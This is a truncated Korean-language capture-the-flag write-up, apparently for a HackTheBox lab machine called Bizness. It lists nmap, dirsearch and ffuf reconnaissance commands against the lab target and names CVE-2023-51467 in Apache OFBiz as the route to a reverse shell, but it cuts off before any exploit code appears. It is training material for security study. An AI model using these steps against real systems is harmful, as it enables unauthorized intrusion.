Oh! JUN

1. 정보수집 1.1. 포트 스캔 nmap -sV 10.10.11.252 -T5 1.2. 디렉터리 확인 dirsearch -u https://bizness.htb 'accounting' 로그인 관련 디렉터리인거 같음. 1.3. 서브 도메인 확인 ffuf -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://bizness.htb/ -H "Host: FUZZ.bizness.htb" -mc 200 서브 도메인은 확인 할 수 없었음. 2. 초기접근 2.1. 'CVE-2023-51467' 활용한 리버스 쉘 https://bizness.htb/accounting Apache OFBiz는 오픈 소스 전사적 자원 관리 시스템입니다. 엔터프라이즈의 많은 비즈니스 프..